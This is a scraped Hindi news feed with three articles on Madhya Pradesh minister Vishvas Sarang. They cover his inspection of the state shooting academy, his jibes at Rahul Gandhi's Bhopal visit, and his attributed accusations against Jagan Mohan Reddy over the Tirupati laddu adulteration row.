शूटिंग में मध्यप्रदेश देश का अग्रणी राज्य बनने की दिशा में अग्रसर- मंत्री सारंग https://pratyushaashakinayikiran.com/?p=179544 Thu, 21 Aug 2025 07:16:00 +0000 https://pratyushaashakinayikiran.com/?p=179544 शूटिंग में मध्यप्रदेश देश का अग्रणी राज्य बनने की दिशा में अग्रसर- मंत्री सारंग

मंत्री सारंग: शूटिंग में मध्यप्रदेश देश का अग्रणी राज्य बनने की राह पर

मध्यप्रदेश शूटिंग में अग्रणी बनने की दिशा में, मंत्री सारंग ने दी जानकारी

मंत्री सारंग ने राज्य शूटिंग अकादमी का किया निरीक्षण

भोपाल
खेल एवं युवा कल्याण मंत्री विश्वास सारंग ने बुधवार को मध्यप्रदेश राज्य शूटिंग अकादमी का निरीक्षण कर वहाँ की व्यवस्थाओं का अवलोकन किया। इस दौरान उन्होंने अकादमी में अभ्यासरत प्रदेश के प्रतिभावान शूटिंग खिलाड़ियों से संवाद किया और उनका उत्साहवर्धन किया।

मंत्री सारंग ने कहा कि यह हमारे लिए गर्व का विषय है कि मध्यप्रदेश शूटिंग में देश को अग्रणी राज्य बनने की दिशा में अग्रसर है। उन्होंने बताया कि प्रदेश सरकार खिलाड़ियों को विश्वस्तरीय खेल अधोसंरचना, प्रशिक्षित कोचिंग स्टाफ और उत्कृष्ट अवसर उपलब्ध करा रही है। हमारी सरकार की सर्वोच्च प्राथमिकता है कि हमारे खिलाड़ी राष्ट्रीय एवं अंतर्राष्ट्रीय स्तर पर प्रदेश और देश का नाम रोशन करें।

मंत्री सारंग ने खिलाड़ियों से बातचीत के दौरान उनकी आवश्यकताओं और सुझावों को भी गंभीरता से सुना और भरोसा दिलाया कि सरकार हर संभव सहयोग करेगी। सारंग ने कहा कि मुख्यमंत्री डॉ. मोहन यादव के नेतृत्व में प्रदेश सरकार खेल प्रतिभाओं को निखारने और उन्हें नई ऊँचाइयों तक पहुँचाने के लिए प्रतिबद्ध है।

निरीक्षण के दौरान मंत्री सारंग ने अकादमी परिसर की विभिन्न सुविधाओं का जायजा लिया और अधिकारियों को खिलाड़ियों की सुविधाओं में बेहतरी के निर्देश दिए।

 

]]>
‘वे पॉलिटिकल टूरिज्म पर हैं’, राहुल गांधी के भोपाल दौरे पर MP के मंत्री बोले https://pratyushaashakinayikiran.com/?p=161094 Tue, 03 Jun 2025 08:56:00 +0000 https://pratyushaashakinayikiran.com/?p=161094 भोपाल

लोकसभा में विपक्ष के नेता राहुल गांधी भोपाल में मध्य प्रदेश कांग्रेस के 'संगठन सृजन अभियान' की शुरुआत करने जा रहे हैं. इस अभियान का उद्देश्य 2028 के विधानसभा चुनावों के लिए पार्टी को मजबूत करना और खोई हुई साख को वापस लाना है. हालांकि, इस दौरे को लेकर मध्य प्रदेश सरकार के मंत्री विश्वास सारंग ने तीखा हमला बोला है. उन्होंने कहा कि राहुल गांधी का यह दौरा 'पॉलिटिकल टूरिज्म' का हिस्सा है और कांग्रेस का यह प्रयास संगठन के विस्तार के बजाय 'नेहरू परिवार के सृजन' के लिए है.

मंत्री विश्वास सारंग ने तंज कसते हुए कहा, "नेहरू परिवार कोई भी कार्यक्रम पार्टी के सृजन के लिए नहीं, बल्कि अपने परिवार के सृजन के लिए करता है. राहुल गांधी साल में अलग-अलग तरह के टूरिज्म करते हैं, अब वे पॉलिटिकल टूरिज्म पर निकले हैं."

सारंग ने नेशनल हेराल्ड मामले में कथित गबन का जिक्र करते हुए कहा, "करोड़ों के गबन के बाद बचे पैसे से हवाई जहाज और होटलों का इंतजाम होता है."

मंत्री सारंग ने आगे आरोप लगाया कि कांग्रेस का इतिहास रहा है कि हर समय केवल नेता और उनके चमचों को ही जगह मिलती है. उन्होंने दावा किया कि राहुल गांधी के दौरे से कांग्रेस की स्थिति 'बद से बदतर' होगी और भोपाल में लगे होर्डिंग्स में 'हर हिस्ट्रीशीटर की फोटो राहुल गांधी के साथ' दिख रही है. सारंग ने इसे कांग्रेस का 'दिखावा और ढकोसला' करार देते हुए कहा कि कांग्रेस की दुकान और शोरूम पूरी तरह बंद हो चुके हैं.

दूसरी ओर, मध्य प्रदेश कांग्रेस ने राहुल गांधी के दौरे को ऐतिहासिक बताया है. पार्टी नेताओं के अनुसार, राहुल गांधी का यह दौरा सुबह 11 बजे शुरू होगा और करीब पांच घंटे तक चलेगा, जिसमें वे पांच महत्वपूर्ण बैठकों में हिस्सा लेंगे. मध्य प्रदेश कांग्रेस के पूर्व अध्यक्ष अरुण यादव और पूर्व मंत्री सज्जन वर्मा ने कहा, "यह अभियान संगठन को जमीनी स्तर पर मजबूत करने और कार्यकर्ताओं में जोश भरने के लिए शुरू किया जा रहा है. हम 2003 से, दिसंबर 2018 से मार्च 2020 की 15 महीने की अवधि को छोड़कर, सत्ता से बाहर हैं."

मध्य प्रदेश कांग्रेस मीडिया समन्वयक अभिनव बरोलिया ने बताया कि इस दौरे के दौरान कांग्रेस एक प्रस्ताव पारित कर राहुल गांधी को जाति आधारित जनगणना की वकालत के लिए धन्यवाद देगी. यह प्रस्ताव विशेष रूप से अन्य पिछड़ा वर्ग (ओबीसी) के उत्थान पर केंद्रित होगा, जो मध्य प्रदेश की आबादी का 50 प्रतिशत से अधिक है.

 

]]>
तिरुपति मंदिर लड्डू विवाद पर मंत्री सारंग का जगन मोहन रेड्डी पर हमला, कहा- ये अंतरराष्ट्रीय साजिश, बताया अक्षम्य पाप https://pratyushaashakinayikiran.com/?p=73183 Sat, 21 Sep 2024 18:06:00 +0000 https://pratyushaashakinayikiran.com/?p=73183 भोपाल

विश्व प्रसिद्द तिरुपति बालाजी मंदिर में मिलावटी, अशुद्ध लड्डू का मामला गर्माता जा रहा है, चंद्रबाबू नायडू सरकार के खुलासे के बाद आंध्रप्रदेश की पूर्ववर्ती जगन मोहन रेड्डी सरकार पर सवालिया निशान खड़े हो रहे हैं। भाजपा ने इसे लेकर बड़ा हमला किया है और इसे एक अंतरराष्ट्रीय साजिश बताया है, मध्य प्रदेश के कैबिनेट मंत्री विश्वास सारंग ने कहा कि ये पाप है, अक्षम्य अपराध है जो सात पीढ़ी तक निकलता है।

उन्होंने कहा कि ये जो मामला सामने आया है उससे सम्पूर्ण हिन्दू समाज शर्मसार है, जगन मोहन रेड्डी की तत्कालीन सरकार ने बदतमीजी और घ्रणा की सभी सीमाएं लाँघ दी। वो तिरुपति बालाजी मंदिर जो करोड़ों हिन्दुओं के आदर और श्रद्धा का केंद्र हैं वहां के लड्डू (प्रसादम) में इस तरह की मिलावट करना, मुझे लगता है ये अंतरराष्ट्रीय साजिश है हमें ये सोचना पड़ेगा कि जगन मोहन रेड्डी ने ऐसा क्यों किया?

बड़ा सवाल कांग्रेस ऐसे कृत्यों को संरक्षण क्यों दे रही है

खेल एवं युवा कल्याण मंत्री विश्वास सारंग ने कहा कि हमें देखना होगा कि कांग्रेस इस तरह के कृत्य को संरक्षण क्यों दे रही है, हिन्दू धर्म का अपमान करना, हिन्दू आस्था पर चोट करना, सनातन धर्म को अपमानित करना ये एक बड़ी साजिश है। कांग्रेस के नेता, जगन मोहन रेड्डी सहित अन्य कई नेता हिन्दू देवी देवताओं का लगातार अपमान करते आये हैं लेकिन ये तो पाप है।

रेड्डी परिवार ने जो पाप किया वो अक्षम्य है

उन्होंने कहा कि पाप करने वाले को ध्यान रखना चाहिए पाप का केवल प्रायश्चित नहीं होता ये अक्षम्य अपराध है इसे किसी भी कीमत पर सहन नहीं किया जायेगा, जगन मोहन रेड्डी परिवार ने जो पाप किया है वो अक्षम्य है ये सात पीढ़ी तक निकलता है इसकी जितनी निंदा की जाये कम है।

नायडू सरकार द्वारा कराई गई जाँच में हुआ है खुलासा

आपको बता दें कि तिरुमाला स्थित भगवान तिरुपति बालाजी मंदिर के लड्डू (प्रसादम) को बनाने वाले घी में जानवरों की चर्बी, मछली का तेल आदि की शिकायत के बाद मुख्यमंत्री चन्द्रबाबू नायडू ने राष्ट्रीय डेयरी विकास बोर्ड ने तिरुपति मंदिर में चढ़ने वाले लड्डू की जांच की और रिपोर्ट में जो खुलासा हुआ उसके सामने आने के बाद बवाल मचा हुआ है।

मंदिर के पूर्व मुख्य पुजारी का बयान भी आया सामने

मुख्यमंत्री नायडू ने जगन मोहन रेड्डी सरकार पर तिरुपति के लड्डू की पवित्रता ख़राब करने के आरोप लगाये थे हालाँकि वाईएसआर कांग्रेस ने इन आरोपों कोनकार दिया है। ये मुद्दा देश में तूफान मचाये हुए है इसी बीच मंदिर के पूर्व मुख्य पुजारी रमण दीक्षाथलु का बयान भी सामने आया है उन्होंने कहा कि लड्डू बनाने वाले घी में मिलावट की उन्हें जानकारी थी इसकी शिकायत उन्होंने संबंधित अधिकारियों और देवस्थानम प्रमुख के सामने भी रखी थी लेकिन किसी ने इसपर ध्यान नहीं दिया।

]]>